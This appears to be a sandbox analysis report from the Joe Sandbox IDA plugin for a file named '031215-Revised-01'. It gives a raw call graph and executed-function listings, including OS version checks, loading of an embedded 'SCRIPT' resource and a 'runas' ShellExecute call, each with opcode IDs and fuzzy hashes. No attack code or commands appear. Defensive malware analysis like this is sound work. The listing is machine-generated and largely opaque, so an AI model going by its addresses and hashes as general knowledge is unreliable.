97497->97499 97498 72fbf 97500 7a8c7 22 API calls 97498->97500 97501 76a50 22 API calls 97499->97501 97502 72fcd 97500->97502 97503 73006 97501->97503 97534 73084 22 API calls 97502->97534 97535 770b0 23 API calls 97503->97535 97506 73021 97509 73065 97506->97509 97536 76f88 22 API calls 97506->97536 97537 770b0 23 API calls 97506->97537 97538 73084 22 API calls 97506->97538 97512 74af0 __wsopen_s 97511->97512 97513 76b57 22 API calls 97512->97513 97514 74b22 97512->97514 97513->97514 97515 74c6d 22 API calls 97514->97515 97520 74b58 97514->97520 97515->97514 97516 79cb3 22 API calls 97518 74c52 97516->97518 97517 79cb3 22 API calls 97517->97520 97519 7515f 22 API calls 97518->97519 97522 74c5e 97519->97522 97520->97517 97521 7515f 22 API calls 97520->97521 97523 74c29 97520->97523 97524 74c6d 22 API calls 97520->97524 97521->97520 97522->97436 97523->97516 97523->97522 97524->97520 97525->97453 97526->97459 97527->97468 97528->97477 97529->97480 97530->97485 97531->97490 97532->97493 97533->97498 97534->97494 97535->97506 97536->97506 97537->97506 97538->97506 97539->97460 97540->97465 97541->97470 97542->97478 97543->97489 97544 a90fa 97545 a9107 97544->97545 97549 a911f 97544->97549 97594 9f2d9 20 API calls __dosmaperr 97545->97594 97547 a910c 97595 a27ec 26 API calls pre_c_initialization 97547->97595 97550 a917a 97549->97550 97558 a9117 97549->97558 97596 afdc4 21 API calls 2 library calls 97549->97596 97552 9d955 __fread_nolock 26 API calls 97550->97552 97553 a9192 97552->97553 97564 a8c32 97553->97564 97555 a9199 97556 9d955 __fread_nolock 26 API calls 97555->97556 97555->97558 97557 a91c5 97556->97557 97557->97558 97559 9d955 __fread_nolock 26 API calls 97557->97559 97560 a91d3 97559->97560 97560->97558 97561 9d955 __fread_nolock 26 API calls 97560->97561 97562 a91e3 97561->97562 97563 9d955 __fread_nolock 26 API calls 97562->97563 97563->97558 97565 a8c3e ___DestructExceptionObject 97564->97565 97566 a8c5e 97565->97566 97567 a8c46 97565->97567 97568 a8d24 97566->97568 97573 a8c97 97566->97573 97598 9f2c6 20 API calls __dosmaperr 97567->97598 97605 9f2c6 20 API calls __dosmaperr 97568->97605 97570 a8c4b 97599 9f2d9 20 API calls __dosmaperr 97570->97599 97575 a8cbb 97573->97575 97576 a8ca6 97573->97576 97574 a8d29 97606 9f2d9 20 API calls __dosmaperr 97574->97606 97597 a5147 EnterCriticalSection 97575->97597 97600 9f2c6 20 API calls __dosmaperr 97576->97600 97580 a8cb3 97607 a27ec 26 API calls pre_c_initialization 97580->97607 97581 a8cab 97601 9f2d9 20 API calls __dosmaperr 97581->97601 97582 a8cc1 97586 a8cdd 97582->97586 97587 a8cf2 97582->97587 97584 a8c53 __fread_nolock 97584->97555 97602 9f2d9 20 API calls __dosmaperr 97586->97602 97589 a8d45 __fread_nolock 38 API calls 97587->97589 97591 a8ced 97589->97591 97590 a8ce2 97603 9f2c6 20 API calls __dosmaperr 97590->97603 97604 a8d1c LeaveCriticalSection __wsopen_s 97591->97604 97594->97547 97595->97558 97596->97550 97597->97582 97598->97570 97599->97584 97600->97581 97601->97580 97602->97590 97603->97591 97604->97584 97605->97574 97606->97580 97607->97584 97608 73156 97611 73170 97608->97611 97612 73187 97611->97612 97613 7318c 97612->97613 97614 731eb 97612->97614 97650 731e9 97612->97650 97615 73265 PostQuitMessage 97613->97615 97616 73199 97613->97616 97618 b2dfb 97614->97618 97619 731f1 97614->97619 97623 7316a 97615->97623 97621 731a4 97616->97621 97622 b2e7c 97616->97622 97617 731d0 DefWindowProcW 97617->97623 97667 718e2 10 API calls 97618->97667 97624 7321d SetTimer RegisterWindowMessageW 97619->97624 97625 731f8 97619->97625 97629 b2e68 97621->97629 97630 731ae 97621->97630 97671 dbf30 34 API calls ___scrt_fastfail 97622->97671 97624->97623 97631 73246 CreatePopupMenu 97624->97631 97626 73201 KillTimer 97625->97626 97627 b2d9c 97625->97627 97663 730f2 Shell_NotifyIconW ___scrt_fastfail 97626->97663 97639 b2da1 97627->97639 97640 b2dd7 MoveWindow 97627->97640 97628 b2e1c 97668 8e499 42 API calls 97628->97668 97656 dc161 97629->97656 97636 b2e4d 97630->97636 97637 731b9 97630->97637 97631->97623 97636->97617 97670 d0ad7 22 API calls 97636->97670 97642 731c4 97637->97642 97643 73253 97637->97643 97638 b2e8e 97638->97617 97638->97623 97644 b2da7 97639->97644 97645 b2dc6 SetFocus 97639->97645 97640->97623 97641 73214 97664 73c50 DeleteObject DestroyWindow 97641->97664 97642->97617 97669 730f2 Shell_NotifyIconW ___scrt_fastfail 97642->97669 97665 7326f 44 API calls ___scrt_fastfail 97643->97665 97644->97642 97649 b2db0 97644->97649 97645->97623 97666 718e2 10 API calls 97649->97666 97650->97617 97651 73263 97651->97623 97654 b2e41 97655 73837 49 API calls 97654->97655 97655->97650 97657 dc179 ___scrt_fastfail 97656->97657 97658 dc276 97656->97658 97659 73923 24 API calls 97657->97659 97658->97623 97661 dc1a0 97659->97661 97660 dc25f KillTimer SetTimer 97660->97658 97661->97660 97662 dc251 Shell_NotifyIconW 97661->97662 97662->97660 97663->97641 97664->97623 97665->97651 97666->97623 97667->97628 97668->97642 97669->97654 97670->97650 97671->97638 97672 903fb 97673 90407 ___DestructExceptionObject 97672->97673 97701 8feb1 97673->97701 97675 9040e 97676 90561 97675->97676 97679 90438 97675->97679 97728 9083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97676->97728 97678 90568 97729 94e52 28 API calls _abort 97678->97729 97690 90477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97679->97690 97712 a247d 97679->97712 97681 9056e 97730 94e04 28 API calls _abort 97681->97730 97685 90576 97686 90457 97688 904d8 97720 90959 97688->97720 97690->97688 97724 94e1a 38 API calls 3 library calls 97690->97724 97692 904de 97693 904f3 97692->97693 97725 90992 GetModuleHandleW 97693->97725 97695 904fa 97695->97678 97696 904fe 97695->97696 97697 90507 97696->97697 97726 94df5 28 API calls _abort 97696->97726 97727 90040 13 API calls 2 library calls 97697->97727 97700 9050f 97700->97686 97702 8feba 97701->97702 97731 90698 IsProcessorFeaturePresent 97702->97731 97704 8fec6 97732 92c94 10 API calls 3 library calls 97704->97732 97706 8fecb 97707 8fecf 97706->97707 97733 a2317 97706->97733 97707->97675 97710 8fee6 97710->97675 97715 a2494 97712->97715 97713 90a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97714 90451 97713->97714 97714->97686 97716 a2421 97714->97716 97715->97713 97718 a2450 97716->97718 97717 90a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97719 a2479 97717->97719 97718->97717 97719->97690 97776 92340 97720->97776 97722 9096c GetStartupInfoW 97723 9097f 97722->97723 97723->97692 97724->97688 97725->97695 97726->97697 97727->97700 97728->97678 97729->97681 97730->97685 97731->97704 97732->97706 97737 ad1f6 97733->97737 97736 92cbd 8 API calls 3 library calls 97736->97707 97740 ad213 97737->97740 97741 ad20f 97737->97741 97738 90a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97739 8fed8 97738->97739 97739->97710 97739->97736 97740->97741 97743 a4bfb 97740->97743 97741->97738 97744 a4c07 ___DestructExceptionObject 97743->97744 97755 a2f5e EnterCriticalSection 97744->97755 97746 a4c0e 97756 a50af 97746->97756 97748 a4c1d 97749 a4c2c 97748->97749 97769 a4a8f 29 API calls 97748->97769 97771 a4c48 LeaveCriticalSection _abort 97749->97771 97752 a4c27 97770 a4b45 GetStdHandle GetFileType 97752->97770 97753 a4c3d __fread_nolock 97753->97740 97755->97746 97757 a50bb ___DestructExceptionObject 97756->97757 97758 a50c8 97757->97758 97759 a50df 97757->97759 97773 9f2d9 20 API calls __dosmaperr 97758->97773 97772 a2f5e EnterCriticalSection 97759->97772 97762 a50cd 97774 a27ec 26 API calls pre_c_initialization 97762->97774 97763 a50eb 97767 a5000 __wsopen_s 21 API calls 97763->97767 97768 a5117 97763->97768 97765 a50d7 __fread_nolock 97765->97748 97767->97763 97775 a513e LeaveCriticalSection _abort 97768->97775 97769->97752 97770->97749 97771->97753 97772->97763 97773->97762 97774->97765 97775->97765 97777 92357 97776->97777 97777->97722 97777->97777 97778 71033 97783 74c91 97778->97783 97782 71042 97784 7a961 22 API calls 97783->97784 97785 74cff 97784->97785 97791 73af0 97785->97791 97787 74d9c 97789 71038 97787->97789 97794 751f7 22 API calls __fread_nolock 97787->97794 97790 900a3 29 API calls __onexit 97789->97790 97790->97782 97795 73b1c 97791->97795 97794->97787 97796 73b0f 97795->97796 97797 73b29 97795->97797 97796->97787 97797->97796 97798 73b30 RegOpenKeyExW 97797->97798 97798->97796 97799 73b4a RegQueryValueExW 97798->97799 97800 73b80 RegCloseKey 97799->97800 97801 73b6b 97799->97801 97800->97796 97801->97800 97802 7fe73 97809 8ceb1 97802->97809 97804 7fe89 97818 8cf92 97804->97818 97806 7feb3 97830 e359c 82 API calls __wsopen_s 97806->97830 97808 c4ab8 97810 8cebf 97809->97810 97811 8ced2 97809->97811 97831 7aceb 23 API calls messages 97810->97831 97813 8cf05 97811->97813 97814 8ced7 97811->97814 97832 7aceb 23 API calls messages 97813->97832 97815 8fddb 22 API calls 97814->97815 97817 8cec9 97815->97817 97817->97804 97819 76270 22 API calls 97818->97819 97820 8cfc9 97819->97820 97821 8cffa 97820->97821 97822 79cb3 22 API calls 97820->97822 97821->97806 97823 cd166 97822->97823 97824 76350 22 API calls 97823->97824 97825 cd171 97824->97825 97833 8d2f0 40 API calls 97825->97833 97827 cd184 97829 cd188 97827->97829 97834 7aceb 23 API calls messages 97827->97834 97829->97829 97830->97808 97831->97817 97832->97817 97833->97827 97834->97829 97835 7df10 97838 7b710 97835->97838 97839 7b72b 97838->97839 97840 c00f8 97839->97840 97841 c0146 97839->97841 97853 7b750 97839->97853 97844 c0102 97840->97844 97847 c010f 97840->97847 97840->97853 97880 f58a2 235 API calls 2 library calls 97841->97880 97878 f5d33 235 API calls 97844->97878 97864 7ba20 97847->97864 97879 f61d0 235 API calls 2 library calls 97847->97879 97850 c03d9 97850->97850 97852 7bbe0 40 API calls 97852->97853 97853->97852 97856 7ba4e 97853->97856 97857 c0322 97853->97857 97853->97864 97865 8d336 40 API calls 97853->97865 97866 7ec40 235 API calls 97853->97866 97867 7a8c7 22 API calls 97853->97867 97869 7a81b 41 API calls 97853->97869 97870 8d2f0 40 API calls 97853->97870 97871 8a01b 235 API calls 97853->97871 97872 90242 5 API calls __Init_thread_wait 97853->97872 97873 8edcd 22 API calls 97853->97873 97874 900a3 29 API calls __onexit 97853->97874 97875 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97853->97875 97876 8ee53 82 API calls 97853->97876 97877 8e5ca 235 API calls 97853->97877 97881 7aceb 23 API calls messages 97853->97881 97882 cf6bf 23 API calls 97853->97882 97883 f5c0c 82 API calls 97857->97883 97864->97856 97884 e359c 82 API calls __wsopen_s 97864->97884 97865->97853 97866->97853 97867->97853 97869->97853 97870->97853 97871->97853 97872->97853 97873->97853 97874->97853 97875->97853 97876->97853 97877->97853 97878->97847 97879->97864 97880->97853 97881->97853 97882->97853 97883->97864 97884->97850 97885 7f7bf 97886 7fcb6 97885->97886 97887 7f7d3 97885->97887 97922 7aceb 23 API calls messages 97886->97922 97889 7fcc2 97887->97889 97890 8fddb 22 API calls 97887->97890 97923 7aceb 23 API calls messages 97889->97923 97892 7f7e5 97890->97892 97892->97889 97893 7f83e 97892->97893 97894 7fd3d 97892->97894 97896 81310 235 API calls 97893->97896 97911 7ed9d messages 97893->97911 97924 e1155 22 API calls 97894->97924 97917 7ec76 messages 97896->97917 97898 7fef7 97905 7a8c7 22 API calls 97898->97905 97898->97911 97899 8fddb 22 API calls 97899->97917 97901 c4b0b 97926 e359c 82 API calls __wsopen_s 97901->97926 97902 c4600 97908 7a8c7 22 API calls 97902->97908 97902->97911 97905->97911 97907 7a8c7 22 API calls 97907->97917 97908->97911 97909 7fbe3 97909->97911 97912 c4bdc 97909->97912 97919 7f3ae messages 97909->97919 97910 7a961 22 API calls 97910->97917 97927 e359c 82 API calls __wsopen_s 97912->97927 97913 90242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97913->97917 97915 c4beb 97928 e359c 82 API calls __wsopen_s 97915->97928 97916 900a3 29 API calls pre_c_initialization 97916->97917 97917->97898 97917->97899 97917->97901 97917->97902 97917->97907 97917->97909 97917->97910 97917->97911 97917->97913 97917->97915 97917->97916 97918 901f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97917->97918 97917->97919 97920 801e0 235 API calls 2 library calls 97917->97920 97921 806a0 41 API calls messages 97917->97921 97918->97917 97919->97911 97925 e359c 82 API calls __wsopen_s 97919->97925 97920->97917 97921->97917 97922->97889 97923->97894 97924->97911 97925->97911 97926->97911 97927->97915 97928->97911 97929 c3f75 97930 8ceb1 23 API calls 97929->97930 97931 c3f8b 97930->97931 97932 c4006 97931->97932 97940 8e300 23 API calls 97931->97940 97935 7bf40 235 API calls 97932->97935 97934 c3fe6 97937 c4052 97934->97937 97941 e1abf 22 API calls 97934->97941 97935->97937 97938 c4a88 97937->97938 97942 e359c 82 API calls __wsopen_s 97937->97942 97940->97934 97941->97932 97942->97938 97943 7dddc 97944 7b710 235 API calls 97943->97944 97945 7ddea 97944->97945 97946 7105b 97951 7344d 97946->97951 97948 7106a 97982 900a3 29 API calls __onexit 97948->97982 97950 71074 97952 7345d __wsopen_s 97951->97952 97953 7a961 22 API calls 97952->97953 97954 73513 97953->97954 97955 73a5a 24 API calls 97954->97955 97956 7351c 97955->97956 97983 73357 97956->97983 97959 733c6 22 API calls 97960 73535 97959->97960 97961 7515f 22 API calls 97960->97961 97962 73544 97961->97962 97963 7a961 22 API calls 97962->97963 97964 7354d 97963->97964 97965 7a6c3 22 API calls 97964->97965 97966 73556 RegOpenKeyExW 97965->97966 97967 b3176 RegQueryValueExW 97966->97967 97972 73578 97966->97972 97968 b320c RegCloseKey 97967->97968 97969 b3193 97967->97969 97968->97972 97974 b321e _wcslen 97968->97974 97970 8fe0b 22 API calls 97969->97970 97971 b31ac 97970->97971 97973 75722 22 API calls 97971->97973 97972->97948 97975 b31b7 RegQueryValueExW 97973->97975 97974->97972 97976 74c6d 22 API calls 97974->97976 97980 79cb3 22 API calls 97974->97980 97981 7515f 22 API calls 97974->97981 97977 b31ee messages 97975->97977 97978 b31d4 97975->97978 97976->97974 97977->97968 97979 76b57 22 API calls 97978->97979 97979->97977 97980->97974 97981->97974 97982->97950 97984 b1f50 __wsopen_s 97983->97984 97985 73364 GetFullPathNameW 97984->97985 97986 73386 97985->97986 97987 76b57 22 API calls 97986->97987 97988 733a4 97987->97988 97988->97959 97989 71098 97994 742de 97989->97994 97993 710a7 97995 7a961 22 API calls 97994->97995 97996 742f5 GetVersionExW 97995->97996 97997 76b57 22 API calls 97996->97997 97998 74342 97997->97998 97999 793b2 22 API calls 97998->97999 98011 74378 97998->98011 98000 7436c 97999->98000 98002 737a0 22 API calls 98000->98002 98001 7441b GetCurrentProcess IsWow64Process 98003 74437 98001->98003 98002->98011 98004 7444f LoadLibraryA 98003->98004 98005 b3824 GetSystemInfo 98003->98005 98006 74460 GetProcAddress 98004->98006 98007 7449c GetSystemInfo 98004->98007 98006->98007 98010 74470 GetNativeSystemInfo 98006->98010 98008 74476 98007->98008 98012 7109d 98008->98012 98013 7447a FreeLibrary 98008->98013 98009 b37df 98010->98008 98011->98001 98011->98009 98014 900a3 29 API calls __onexit 98012->98014 98013->98012 98014->97993

                                        Executed Functions

                                        Function 000742DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 234 742de-7434d call 7a961 GetVersionExW call 76b57 239 74353 234->239 240 b3617-b362a 234->240 242 74355-74357 239->242 241 b362b-b362f 240->241 243 b3632-b363e 241->243 244 b3631 241->244 245 7435d-743bc call 793b2 call 737a0 242->245 246 b3656 242->246 243->241 247 b3640-b3642 243->247 244->243 260 b37df-b37e6 245->260 261 743c2-743c4 245->261 250 b365d-b3660 246->250 247->242 249 b3648-b364f 247->249 249->240 252 b3651 249->252 253 7441b-74435 GetCurrentProcess IsWow64Process 250->253 254 b3666-b36a8 250->254 252->246 257 74437 253->257 258 74494-7449a 253->258 254->253 259 b36ae-b36b1 254->259 262 7443d-74449 257->262 258->262 263 b36db-b36e5 259->263 264 b36b3-b36bd 259->264 268 b37e8 260->268 269 b3806-b3809 260->269 261->250 267 743ca-743dd 261->267 272 7444f-7445e LoadLibraryA 262->272 273 b3824-b3828 GetSystemInfo 262->273 270 b36f8-b3702 263->270 271 b36e7-b36f3 263->271 265 b36ca-b36d6 264->265 266 b36bf-b36c5 264->266 265->253 266->253 274 743e3-743e5 267->274 275 b3726-b372f 267->275 276 b37ee 268->276 279 b380b-b381a 269->279 280 b37f4-b37fc 269->280 277 b3715-b3721 270->277 278 b3704-b3710 270->278 271->253 281 74460-7446e GetProcAddress 272->281 282 7449c-744a6 GetSystemInfo 272->282 284 b374d-b3762 274->284 285 743eb-743ee 274->285 286 b373c-b3748 275->286 287 b3731-b3737 275->287 276->280 277->253 278->253 279->276 288 b381c-b3822 279->288 280->269 281->282 289 74470-74474 GetNativeSystemInfo 281->289 283 74476-74478 282->283 294 74481-74493 283->294 295 7447a-7447b FreeLibrary 283->295 292 b376f-b377b 284->292 293 b3764-b376a 284->293 290 743f4-7440f 285->290 291 b3791-b3794 285->291 286->253 287->253 288->280 289->283 296 74415 290->296 297 b3780-b378c 290->297 291->253 298 b379a-b37c1 291->298 292->253 293->253 295->294 296->253 297->253 299 b37ce-b37da 298->299 300 b37c3-b37c9 298->300 299->253 300->253
                                        APIs
                                        • GetVersionExW.KERNEL32(?), ref: 0007430D
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        • GetCurrentProcess.KERNEL32(?,0010CB64,00000000,?,?), ref: 00074422
                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 00074429
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00074454
                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00074466
                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00074474
                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0007447B
                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 000744A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                        • API String ID: 3290436268-3101561225
                                        • Opcode ID: 782e3e683eb12292f6959f7853655814fdbade166a622d2dc828a69ee1d52131
                                        • Instruction ID: e88273900d05782d53c67450f0049f5d7b21690027c62dd50a964c913f8dd3a7
                                        • Opcode Fuzzy Hash: 782e3e683eb12292f6959f7853655814fdbade166a622d2dc828a69ee1d52131
                                        • Instruction Fuzzy Hash: 75A1A16AD0A2C0FFC721CF6ABC401E97FE47B27360B188499D08593E32E72449C9DB65
                                        Function 000742A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 661 742a2-742ba CreateStreamOnHGlobal 662 742bc-742d3 FindResourceExW 661->662 663 742da-742dd 661->663 664 b35ba-b35c9 LoadResource 662->664 665 742d9 662->665 664->665 666 b35cf-b35dd SizeofResource 664->666 665->663 666->665 667 b35e3-b35ee LockResource 666->667 667->665 668 b35f4-b35fc 667->668 669 b3600-b3612 668->669 669->665
                                        APIs
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000750AA,?,?,00000000,00000000), ref: 000742B2
                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000750AA,?,?,00000000,00000000), ref: 000742C9
                                        • LoadResource.KERNEL32(?,00000000,?,?,000750AA,?,?,00000000,00000000,?,?,?,?,?,?,00074F20), ref: 000B35BE
                                        • SizeofResource.KERNEL32(?,00000000,?,?,000750AA,?,?,00000000,00000000,?,?,?,?,?,?,00074F20), ref: 000B35D3
                                        • LockResource.KERNEL32(000750AA,?,?,000750AA,?,?,00000000,00000000,?,?,?,?,?,?,00074F20,?), ref: 000B35E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                        • String ID: SCRIPT
                                        • API String ID: 3051347437-3967369404
                                        • Opcode ID: 849b34cf4218b07378f2191849764f90f5ea957c1a51cc0cf7974c17405830f4
                                        • Instruction ID: 534ce52e1dde9ec2e93306a66e6bfa38a64dc7f4b4630cf2d8aae11c3c999de8
                                        • Opcode Fuzzy Hash: 849b34cf4218b07378f2191849764f90f5ea957c1a51cc0cf7974c17405830f4
                                        • Instruction Fuzzy Hash: 15117C70A00700BFD7218B65DC48F677BB9EBC5B51F208269B44696A90DBB1D8518A60
                                        Function 000B2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00072B6B
                                          • Part of subcall function 00073A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00141418,?,00072E7F,?,?,?,00000000), ref: 00073A78
                                          • Part of subcall function 00079CB3: _wcslen.LIBCMT ref: 00079CBD
                                        • GetForegroundWindow.USER32(runas,?,?,?,?,?,00132224), ref: 000B2C10
                                        • ShellExecuteW.SHELL32(00000000,?,?,00132224), ref: 000B2C17
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                        • String ID: runas
                                        • API String ID: 448630720-4000483414
                                        • Opcode ID: 3ec93be7683d68d0bab1c8cdf1fa5152a4b24bfc0af17cee24e5500283670224
                                        • Instruction ID: b8657b0c465818276279b3578542df8628dacf6726f2c2445a421e691f67f523
                                        • Opcode Fuzzy Hash: 3ec93be7683d68d0bab1c8cdf1fa5152a4b24bfc0af17cee24e5500283670224
                                        • Instruction Fuzzy Hash: 3611D631A083456AD714FF60DC52DEE77A4AF91700F44942DF08A520A3DF398A89D756
                                        Function 000DDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,000B5222), ref: 000DDBCE
                                        • GetFileAttributesW.KERNELBASE(?), ref: 000DDBDD
                                        • FindFirstFileW.KERNELBASE(?,?), ref: 000DDBEE
                                        • FindClose.KERNEL32(00000000), ref: 000DDBFA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: FileFind$AttributesCloseFirstlstrlen
                                        • String ID:
                                        • API String ID: 2695905019-0
                                        • Opcode ID: 2bd87ca9dc5581c492b534c4f6cfa74044055dfc17640a9feb8fb2c595a3126c
                                        • Instruction ID: 1aa3f0863e5b79d27b0658c643a8b524d91a178962a86c97379a539ea982bc11
                                        • Opcode Fuzzy Hash: 2bd87ca9dc5581c492b534c4f6cfa74044055dfc17640a9feb8fb2c595a3126c
                                        • Instruction Fuzzy Hash: BDF0A73042061197C2206B789C0D47A37AD9F01334F104703F475C15E1EBF0599489E5
                                        Function 0007CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                        Download Yara Rule
                                        Strings
                                        • Variable is not of type 'Object'., xrefs: 000C0C40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Variable is not of type 'Object'.
                                        • API String ID: 0-1840281001
                                        • Opcode ID: 1f944019f5fa2216b0ca4c3fea264631a16bcabbd5b0d0962a15b9c63f448e1f
                                        • Instruction ID: 736333a707e16d2a810084a0b5a44f0c93651472b6529541ed9c4d093824616e
                                        • Opcode Fuzzy Hash: 1f944019f5fa2216b0ca4c3fea264631a16bcabbd5b0d0962a15b9c63f448e1f
                                        • Instruction Fuzzy Hash: BC323570900218DBEF24DF94C895FEDB7B5BF05304F24806DE80AAB292D779AE45CB65
                                        Function 0007D730 Relevance: 21.6, APIs: 14, Instructions: 625windowsleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetInputState.USER32 ref: 0007D807
                                        • timeGetTime.WINMM ref: 0007DA07
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0007DB28
                                        • TranslateMessage.USER32(?), ref: 0007DB7B
                                        • DispatchMessageW.USER32(?), ref: 0007DB89
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0007DB9F
                                        • Sleep.KERNEL32(0000000A), ref: 0007DBB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
